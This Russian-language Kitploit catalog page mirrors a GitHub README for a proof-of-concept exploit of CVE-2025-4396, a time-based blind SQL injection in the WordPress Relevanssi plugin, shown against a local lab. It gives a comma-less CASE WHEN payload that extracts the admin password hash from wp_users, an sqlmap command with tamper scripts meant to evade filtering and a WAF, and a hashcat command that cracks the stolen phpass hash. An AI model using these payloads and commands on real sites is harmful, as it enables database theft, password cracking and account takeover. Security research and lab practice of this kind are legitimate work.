Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4396 — CVE-2025-4396 - WordPress Relevanssi Time-Based Blind SQL Injection | Kitploit
Инструменты/GitHubGitHub/sup3rdav3/cve-2025-4396
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationLabs & Practice
GitHubsup3rdav3/cve-2025-4396

CVE-2025-4396

CVE-2025-4396 - WordPress Relevanssi Time-Based Blind SQL Injection

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-4396 — Relevanssi SQL-инъекция (Time-Based Blind)

Отказ от ответственности: Этот репозиторий предназначен только для авторизованного тестирования на проникновение, исследований в области безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен и неэтичен.


Обзор

Эксплойт типа proof-of-concept для уязвимости time-based blind SQL-инъекции в плагине WordPress Relevanssi 4.24.4. Эта реализация специально предназначена для усиленных сред, в которых:

  • Запятые фильтруются — нарушает стандартный синтаксис SUBSTR(str, pos, len) и IF(cond, true, false)
  • Наблюдается поведение жадного сна (greedy sleep) — заставляет MySQL выполнять SLEEP() до оценки полного выражения, что приводит к ложным срабатываниям

Предыстория

В определенных средах (например, в лаборатории DVWP) стандартные полезные нагрузки SQL-инъекций не работают по двум основным причинам:

ПроблемаЭффект
Удаление запятыхНарушает SUBSTR(str, pos, len) и IF(cond, true, false)
Жадный SLEEP()MySQL выполняет sleep до полного логического выражения, вызывая ложные срабатывания

Обе проблемы требуют целенаправленных обходных решений — они рассматриваются в ручном и автоматизированном подходах ниже.


Ручной эксплойт (asy.py)

Асинхронный скрипт на Python, обеспечивающий точное посимвольное извлечение. Избегает накладных расходов автоматизированных инструментов и обходит фильтрацию запятых с помощью логики CASE WHEN.

Особенности

ОсобенностьРеализация
Асинхронный ввод-выводaiohttp для неблокирующих запросов

Основная логика инъекции

root@kitploit:~
# Comma-less, CASE WHEN-based time-based payload
condition = f"ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1) FROM {pos} FOR 1))>{mid}"
injection = f"1*(SELECT CASE WHEN ({condition}) THEN SLEEP(3) ELSE 1 END)"

Почему CASE WHEN вместо IF()? IF() использует запятые и подвержен жадному вычислению. CASE WHEN вычисляется лениво, гарантируя, что SLEEP() срабатывает только при условии, действительно равном TRUE.


Автоматизированный эксплойт (SQLMap)

SQLMap может автоматизировать обнаружение в этой среде с помощью специальных tamper-скриптов и флагов.

Команда

root@kitploit:~
python3 sqlmap.py -u "http://localhost:31337/?s=test&cats=1*" \
  --tamper=commalessmid,if2case,between \
  --technique=T \
  --dbms=MySQL \
  --no-cast \
  --batch \
  --threads=1 \
  --dbs

Справочник флагов

Примечание по --threads=1: Это необходимо для надёжного извлечения. Несколько потоков вызывают перекрывание задержек сна, нарушая синхронизацию бинарного поиска и приводя к искажённым результатам.


Результаты лабораторных исследований

ПолеЗначение
ЦельТаблица WordPress wp_users

Взлом хэша

root@kitploit:~
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
  • Режим -m 400 нацелен на хэши phpass
  • Атака -a 0 — прямая атака по словарю с использованием rockyou.txt

Ссылки

  • Relevanssi Plugin — WordPress.org
  • SQLMap Tamper Scripts
  • OWASP: Blind SQL Injection
  • phpass — Password Hashing Framework
Скачать инструмент
Полезные нагрузки без запятыхСинтаксис SUBSTR(str FROM pos FOR len)
Нежадная логикаCASE WHEN гарантирует, что SLEEP() срабатывает только при TRUE
ФлагНазначение
--tamper=commalessmid,if2caseПереписывает полезные нагрузки в SQL без запятых; заменяет IF() на CASE WHEN
--tamper=betweenЗаменяет сравнения > на BETWEEN для дополнительного обхода WAF
--technique=TОграничивается только time-based blind injection
--no-castПредотвращает обёртки CAST(), которые вводят запрещённые запятые
--threads=1Обеспечивает точность синхронизации — параллельные запросы вызывают перекрывающиеся задержки сна
Пользовательadmin (ID = 1)
Извлечённый хэшREDACTED
Алгоритмphpass (стандартное хэширование паролей WordPress)